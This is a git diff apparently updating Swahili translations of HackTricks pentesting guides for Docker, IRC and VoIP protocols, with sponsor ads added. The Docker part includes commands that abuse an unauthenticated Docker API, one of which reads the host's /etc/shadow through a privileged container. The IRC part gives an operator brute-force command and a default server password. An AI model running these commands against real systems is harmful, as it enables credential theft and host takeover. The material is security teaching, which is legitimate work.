Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ### Misingi ya Docker #### Ni Nini -Docker ni **jukwaa la mbele** katika **tasnia ya kubebeshaji**, likiongoza **ubunifu endelevu**. Inarahisisha uundaji na usambazaji wa programu, kutoka **za jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali. +Docker ni **jukwaa kuu** katika tasnia ya **containerization**, likiongoza **uvumbuzi endelevu**. Inarahisisha uumbaji na usambazaji wa maombi, kutoka kwa **jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali. -#### Mimarathi ya msingi ya Docker +#### Miundo ya msingi ya Docker -* [**containerd**](http://containerd.io): Hii ni **msingi wa msingi** kwa kontena, ikishughulikia **usimamizi kamili wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**. -* **Container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua nafasi ya **runc** baada ya kontena kuanzishwa. -* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **mwendeshaji wa kontena mwepesi na wa ulimwengu mzima**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd kuanzisha na kusimamia kontena kulingana na **mwongozo wa OCI**, ikiwa imeendelea kutoka kwa **libcontainer** ya awali. +* [**containerd**](http://containerd.io): Hii ni **runtime msingi** kwa kontena, ikishughulikia **usimamizi wa kina wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**. +* **container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua kwa urahisi kutoka kwa **runc** baada ya kontena kuanzishwa. +* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **runtime wa kontena wa mwanga na wa kipekee**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd kuanzisha na kusimamia kontena kulingana na **mwongozo wa OCI**, ikibadilika kutoka kwa **libcontainer** ya awali. * [**grpc**](http://www.grpc.io) ni muhimu kwa **kurahisisha mawasiliano** kati ya containerd na **docker-engine**, ikihakikisha **mwingiliano wenye ufanisi**. -* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa muda wa mzunguko na picha, na toleo la hivi karibuni la Docker linazingatia viwango vya **picha na mzunguko wa OCI**. +* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa runtime na picha, na toleo jipya la Docker likiwa **linazingatia viwango vya picha na runtime** vya OCI vyote. #### Amri za Msingi ```bash @@ -53,9 +67,9 @@ docker system prune -a ``` #### Containerd -**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kutia rahisi utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kujaribu kuacha sehemu zisizo za lazima. Hata hivyo, kufikia lengo hili kikamilifu kunatambuliwa kuwa changamoto. +**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kurahisisha utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kwa lengo la kuacha sehemu zisizo za lazima. Hata hivyo, kutimiza lengo hili kikamilifu kunatambuliwa kuwa changamoto. -Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usimamizi wa mtandao**. Mtandao unachukuliwa kuwa kipengele muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha sehemu za mtandao zisimamiwe na majukwaa inayounga mkono. +Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usanidi wa mtandao**. Mtandao unachukuliwa kuwa sehemu muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha vipengele vya mtandao kusimamiwa na majukwaa inayounga mkono. Wakati **Docker inatumia Containerd** kutekeleza vyombo, ni muhimu kutambua kwamba Containerd inasaidia tu sehemu ya utendaji wa Docker. Kwa kusisitiza, Containerd haina uwezo wa usimamizi wa mtandao uliopo kwenye Docker na haisaidii uundaji wa makundi ya Docker moja kwa moja. Tofauti hii inaonyesha jukumu lililolengwa la Containerd kama mazingira ya utekelezaji wa vyombo, ikipeleka vipengele vilivyospecializika zaidi kwa majukwaa inayoshirikiana nayo. ```bash @@ -75,20 +89,20 @@ ctr container delete ``` #### Podman -**Podman** ni injini ya kontena ya chanzo wazi inayofuata [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **kontena za bila root**, kuruhusu watumiaji kuendesha kontena bila mamlaka ya root. +**Podman** ni injini ya kontena ya chanzo wazi inayofuata [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **kontena za bila root**, kuruhusu watumiaji kuendesha kontena bila mamlaka ya mzizi. Podman imeundwa kuwa sawa na API ya Docker, kuruhusu matumizi ya amri za Docker CLI. Ulinganifu huu unajumuisha mfumo wake, ambao unajumuisha zana kama **Buildah** kwa kujenga picha za kontena na **Skopeo** kwa operesheni za picha kama vile kusukuma, kuvuta, na kupekua. Maelezo zaidi kuhusu zana hizi yanaweza kupatikana kwenye [ukurasa wao wa GitHub](https://github.com/containers/buildah/tree/master/docs/containertools). **Tofauti Kuu** -* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon wa nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha kontena zinaendeshwa na mamlaka za mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa root. +* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon ya nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha kontena zinaendeshwa na mamlaka za mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa mzizi. * **Uingizaji wa systemd**: Podman inaingiliana na **systemd** kusimamia kontena, kuruhusu usimamizi wa kontena kupitia vitengo vya systemd. Hii inatofautiana na matumizi ya Docker ya systemd hasa kwa kusimamia mchakato wa daemon wa Docker. -* **Kontena za Bila Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya mamlaka ya mtumiaji anayeanzisha. Hatua hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa root. +* **Kontena za Bila Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya mamlaka ya mtumiaji anayeanzisha. Mbinu hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomozaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa mzizi. Mbinu ya Podman inatoa mbadala salama na mpana kwa Docker, ikisisitiza usimamizi wa mamlaka ya mtumiaji na ufanisi na mifumo ya kazi ya Docker iliyopo. {% hint style="info" %} -Tafadhali kumbuka kwamba kwa kuwa podam inalenga kusaidia API ile ile kama docker, unaweza kutumia amri sawa na podman kama vile na docker kama vile: +Tafadhali kumbuka kwamba kwa kuwa podman inalenga kusaidia API ile ile kama docker, unaweza kutumia amri sawa na podman kama vile na docker kama vile: ```bash podman --version podman info @@ -99,7 +113,7 @@ podman ls ### Taarifa Msingi -Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho kuruhusu mshambuliaji kuanza kontena la docker lenye mamlaka. Kwa kutumia Remote API mtu anaweza kuambatanisha wenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji. +Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho, ikiruhusu mshambuliaji kuanza kontena ya docker yenye mamlaka. Kwa kutumia Remote API mtu anaweza kuunganisha mwenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji. **Bandari ya chaguo-msingi:** 2375 ``` @@ -158,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash ``` **Curl** -Wakati mwingine utaona **2376** ukiwa juu kwa **TLS** endpoint. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl. +Wakati mwingine utaona **2376** ikiwa wazi kwa **TLS** endpoint. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl. ```bash #List containers curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq @@ -188,7 +202,7 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope #Delete stopped containers curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune ``` -Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri kutoka: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) +Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri hizi: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) #### Moja kwa moja ```bash @@ -203,16 +217,16 @@ Kwenye ukurasa ufuatao unaweza kupata njia za **kutoroka kutoka kwa chombo cha d [docker-security](../linux-hardening/privilege-escalation/docker-security/) {% endcontent-ref %} -Kwa kuitumia hii, niwezekanavyo kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwa mashine: +Kwa kuitumia hii, niwezekana kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwenye mashine: ```bash docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine cat /mnt/etc/shadow ``` * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py) -### Kuboresha Mamlaka +### Kupanda Mamlaka -Ikiwa uko ndani ya mwenyeji anayetumia docker, unaweza [**soma habari hii jaribu kuinua mamlaka**](../linux-hardening/privilege-escalation/#writable-docker-socket). +Ikiwa uko ndani ya mwenyeji anayetumia docker, unaweza [**kusoma habari hii jaribu kuinua mamlaka**](../linux-hardening/privilege-escalation/#writable-docker-socket). ### Kugundua siri katika kontena za Docker zinazoendesha ```bash @@ -275,7 +289,7 @@ docker cp :/etc/ #### Kurekodi Shughuli Zenye Mashaka * Unaweza kutumia zana [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) kugundua **tabia zenye mashaka kwenye vyombo vinavyotekelezwa**. -* Tafadhali angalia kipande kifuatacho jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **anza kurekodi shughuli zenye mashaka**. Katika kesi hii, imetambua vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao ikiwa na kiunganishi nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyoanzishwa ndani ya moja ya vyombo. +* Tafadhali angalia sehemu ifuatayo jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **kuanza kurekodi shughuli zenye mashaka**. Katika kesi hii, imedokeza vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao na kufunga nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyofunguliwa ndani ya moja ya vyombo. ```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco * Setting up /usr/src links from host @@ -325,6 +339,20 @@ Unaweza kutumia auditd kufuatilia docker. * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa: + +{% embed url="https://whiteintel.io" %} + +
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! @@ -333,8 +361,8 @@ Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index 5d1dcc869..b8fe223b8 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -1,28 +1,42 @@ -# 194,6667,6660-7000 - Kupima Udukuzi wa IRC +# 194,6667,6660-7000 - Kupima IRC
-Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochochewa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Taarifa Msingi -IRC, awali **itifaki ya maandishi wazi**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari kama hizo kuepuka kuhitaji **mamlaka ya mizizi** kwa uendeshaji. +IRC, awali **itifaki ya maandishi ya kawaida**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari sawa ili kuepuka kuhitaji **mamlaka ya msingi** kwa uendeshaji. -**Jina la utani** ndilo linalohitajika kuunganisha kwenye seva. Baada ya kuunganisha, seva inafanya utafutaji wa DNS ya nyuma kwenye anwani ya IP ya mtumiaji. +**Jina la utani** ndilo linalohitajika kuunganisha kwenye seva. Baada ya kuunganisha, seva hufanya utafutaji wa DNS wa kurudi kwa IP ya mtumiaji. -Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waadmini wako juu. +Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waendeshaji wa mfumo wako juu. -**Bandari za chaguo-msingi:** 194, 6667, 6660-7000 +**Bandari za msingi:** 194, 6667, 6660-7000 ``` PORT STATE SERVICE 6667/tcp open irc @@ -38,7 +52,7 @@ openssl s_client -connect : -quiet ``` ### Mwongozo -Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la utani lisilojulikana** na kisha kuchunguza habari muhimu. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). +Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la kupotosha** kisha kuchunguza taarifa za kuvutia. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). ```bash #Connection with random nickname USER ran213eqdw123 0 * ran213eqdw123 @@ -67,48 +81,45 @@ JOIN #Connect to a channel #Operator creds Brute-Force OPER ``` -Unaweza, pia, kujaribu kuingia kwenye seva kwa kutumia nenosiri. Nenosiri la chaguo-msingi kwa ngIRCd ni `wealllikedebian`. +Unaweza, pia, kujaribu kuingia kwenye seva kwa kutumia nenosiri. Nenosiri la chaguo kwa ngIRCd ni `wealllikedebian`. ```bash PASS wealllikedebian NICK patrick USER test1 test2 :test3 ``` ### **Tafuta na skani huduma za IRC** - -IRC (Internet Relay Chat) ni mfumo wa mazungumzo ya moja kwa moja kupitia mtandao. IRC inatumia itifaki ya TCP/IP na inaruhusu watumiaji kuwasiliana na kubadilishana ujumbe kwenye vituo vya mazungumzo vilivyoundwa. IRC inaweza kutumiwa kwa mawasiliano ya kibinafsi au kwa mazungumzo ya kikundi. - -Kabla ya kuanza kuchunguza huduma za IRC, unahitaji kujua anwani ya IP ya seva ya IRC unayotaka kuchunguza. Unaweza kutumia zana kama `nslookup` au `dig` ili kupata anwani ya IP ya seva. - -Baada ya kupata anwani ya IP, unaweza kuanza skani ya huduma za IRC kwa kutumia zana kama `nmap`. Skani ya kawaida ya IRC inaweza kufanywa kwa kutumia amri ifuatayo: - -``` -nmap -p 6667 -``` - -Amri hii itascan bandari ya 6667 kwenye anwani ya IP iliyotolewa. Bandari ya 6667 ni bandari ya kawaida inayotumiwa na huduma za IRC. - -Baada ya kukamilisha skani, unaweza kupata habari kuhusu huduma za IRC zinazopatikana kwenye seva. Unaweza kutumia zana kama `telnet` au mteja wa IRC kama `irssi` ili kuunganisha na seva na kuchunguza vituo vya mazungumzo vilivyopo. - -Kumbuka kwamba kuchunguza huduma za IRC bila idhini inaweza kuwa kinyume cha sheria. Hakikisha unafuata sheria na kanuni zinazohusiana na uchunguzi wa kisheria na usalama wa mtandao. ```bash nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 ``` -### [Brute Force](../generic-methodologies-and-resources/brute-force.md#irc) +### [Kujaribu Kuvunja](../generic-methodologies-and-resources/brute-force.md#irc) ### Shodan * `kutafuta jina lako la mwenyeji` + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) **na** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **repos za github.** +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 8b17f14ec..3805c6e76 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -6,82 +6,115 @@ Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
-## Itifaki za Ishara +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +## Itifaki za Kutia Saini ### SIP (Itifaki ya Kuanzisha Kikao) -Hii ni kiwango cha tasnia, kwa habari zaidi angalia: +Hii ni kiwango cha viwanda, kwa maelezo zaidi angalia: {% content-ref url="sip-session-initiation-protocol.md" %} [sip-session-initiation-protocol.md](sip-session-initiation-protocol.md) {% endcontent-ref %} -### MGCP (Itifaki ya Kudhibiti Lango la Vyombo vya Habari) +### MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari) -MGCP (Itifaki ya Kudhibiti Lango la Vyombo vya Habari) ni **itifaki ya ishara** na **kudhibiti wito** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojumuishwa, ambao una sehemu kuu tatu: +MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari) ni **itifaki ya kutia saini** na **kudhibiti simu** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojikita, ambao una sehemu kuu tatu: -1. **Wakala wa Wito au Msimamizi wa Lango la Vyombo vya Habari (MGC)**: Lango kuu katika muundo wa MGCP linawajibika kwa **kusimamia na kudhibiti malango ya vyombo vya habari**. Inashughulikia mchakato wa kuanzisha, kubadilisha, na kumaliza wito. MGC inawasiliana na malango ya vyombo vya habari kwa kutumia itifaki ya MGCP. -2. **Malango ya Vyombo vya Habari (MGs) au Malango ya Watumwa**: Vifaa hivi **hubadilisha mito ya vyombo vya habari ya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyobadilishwa kwa pakiti. Yanasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Malango ya vyombo vya habari yanaweza kuwa na kazi kama vile kubadilisha muundo, kufunga kwenye pakiti, na kufuta sauti. -3. **Malango ya Ishara (SGs)**: Malango haya yanawajibika kwa **kubadilisha ujumbe wa ishara kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao ya IP (k.m., SIP au H.323). Malango ya ishara ni muhimu kwa usanifu wa 